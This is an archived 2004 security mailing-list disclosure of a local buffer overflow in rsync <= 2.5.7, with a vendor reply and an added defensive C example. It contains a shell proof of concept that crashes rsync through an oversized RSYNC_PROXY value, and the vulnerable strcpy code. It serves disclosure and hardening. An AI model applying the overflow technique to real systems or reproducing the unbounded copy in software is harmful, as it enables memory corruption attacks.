Vulnerability Development: rsync <= 2.5.7 local buffer overflow (no root today:)
From: DownBload <downbload_at_hotmail.com>
Date: 9 Feb 2004 21:13:02 -0000
Hi,

There is a local buffer overflow in rsync <= 2.5.7.
The problem is in the open_socket_out function (socket.c).
An attacker can overflow the portbuf[10] buffer on the stack and overwrite the saved return
address.
Rsync isn't suid, so no root shell today :-).

PoC example:
[root_at_localhost rsync-2.5.7]# export RSYNC_PROXY=`perl -e 'print "A" x 100,":","A" x 1000'`
[root_at_localhost rsync-2.5.7]# rsync localhost::
rsync: getaddrinfo:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA: ai_family not supported
Segmentation fault
[root_at_localhost rsync-2.5.7]#


- socket.c
...
        char portbuf[10];
        char *h;
        int proxied = 0;
        char buffer[1024];
        char *cp;


        h = getenv("RSYNC_PROXY");
        proxied = (h != NULL) && (*h != '\0');

        if (proxied) {
                strlcpy(buffer, h, sizeof(buffer));
                cp = strchr(buffer, ':');
                if (cp == NULL) {
                        rprintf(FERROR,
                                "invalid proxy specification: should be HOST:PORT\n");
                        return -1;
                }
                *cp++ = '\0';
                strcpy(portbuf, cp); /* <- OVERFLOW: cp is whatever follows ':' in buffer[1024], portbuf holds 10 bytes */
...


Vendor response:
"Correct. I fixed this in the CVS version earlier this year. Since the proxy
data is coming from the local environment, I don't see a need to roll out an
update to 2.6.0 (which is the latest released version, BTW).
The fix will be in 2.6.1, which should be released in the next month or two."



DownBload / Illegal Instruction Labs
http://www.ii-labs.org
e-mail:downbload[at]hotmail.com

"Born under the lucky star magical,
but on this earth generally tragical."
Received on Feb 09 2004
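The post shows the unchecked strcpy but not the corrected code. The following C program is an added example, not rsync's source and not the poster's code: proxy_port_overflows reproduces the bound the posted snippet relies on (a 10-byte portbuf filled by strcpy from the text after the first ':') as a length check that copies nothing, and parse_proxy_spec is a hypothetical bounded replacement that rejects oversized or non-numeric ports instead of truncating. The buffer sizes match the snippet; the function names, the HOST:PORT payload (built the way the PoC builds it) and the proxy.example.org input are constructed for this example.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Sizes taken from the posted socket.c fragment (buffer[1024], portbuf[10]). */
#define HOSTBUF_SIZE 1024
#define PORTBUF_SIZE 10

/* Models the posted bug without reproducing it: would strcpy(portbuf, cp)
 * write past a PORTBUF_SIZE-byte buffer for this spec?
 * Returns 1 if it would overflow, 0 if it fits, -1 if there is no ':'.
 * Nothing is copied, so hostile input is safe to pass here. */
int proxy_port_overflows(const char *spec)
{
    const char *cp = strchr(spec, ':');
    if (cp == NULL)
        return -1;
    cp++;
    return strlen(cp) + 1 > PORTBUF_SIZE;   /* +1 for the NUL strcpy appends */
}

/* Hypothetical hardened parser: bounded copies plus validation.
 * Returns 0 and fills host/port/portnum on success, -1 on malformed input
 * (missing ':', empty host or port, oversized field, non-numeric or
 * out-of-range port). Rejecting beats silent truncation: a truncated port
 * would still be a wrong port. */
int parse_proxy_spec(const char *spec, char *host, size_t hostlen,
                     char *port, size_t portlen, int *portnum)
{
    const char *cp;
    size_t hlen, plen;
    char *end;
    long val;

    if (spec == NULL || *spec == '\0')
        return -1;
    cp = strchr(spec, ':');
    if (cp == NULL || cp == spec)           /* need a non-empty HOST */
        return -1;
    hlen = (size_t)(cp - spec);
    cp++;
    plen = strlen(cp);
    if (plen == 0 || hlen >= hostlen || plen >= portlen)
        return -1;                          /* leave room for the NUL */
    if (cp[0] < '0' || cp[0] > '9')         /* strtol would accept ' ', '+', '-' */
        return -1;
    errno = 0;
    val = strtol(cp, &end, 10);
    if (errno != 0 || *end != '\0' || val < 1 || val > 65535)
        return -1;
    memcpy(host, spec, hlen);
    host[hlen] = '\0';
    memcpy(port, cp, plen);
    port[plen] = '\0';
    *portnum = (int)val;
    return 0;
}

int main(void)
{
    /* Constructed payload mirroring the PoC: 100 'A', ':', 1000 'A'. */
    char spec[1200];
    char host[HOSTBUF_SIZE], port[PORTBUF_SIZE];
    int portnum;

    memset(spec, 'A', 100);
    spec[100] = ':';
    memset(spec + 101, 'A', 1000);
    spec[1101] = '\0';

    printf("PoC spec would overflow portbuf: %s\n",
           proxy_port_overflows(spec) == 1 ? "yes" : "no");
    printf("hardened parser on PoC spec: %d\n",
           parse_proxy_spec(spec, host, sizeof host, port, sizeof port, &portnum));
    if (parse_proxy_spec("proxy.example.org:3128", host, sizeof host,
                         port, sizeof port, &portnum) == 0)
        printf("accepted host=%s port=%d\n", host, portnum);
    return 0;
}
```

The length check happens before any copy, which is the property the original code lacked: strlcpy bounded the first copy into buffer[1024], but the second copy into portbuf inherited buffer's size rather than its own.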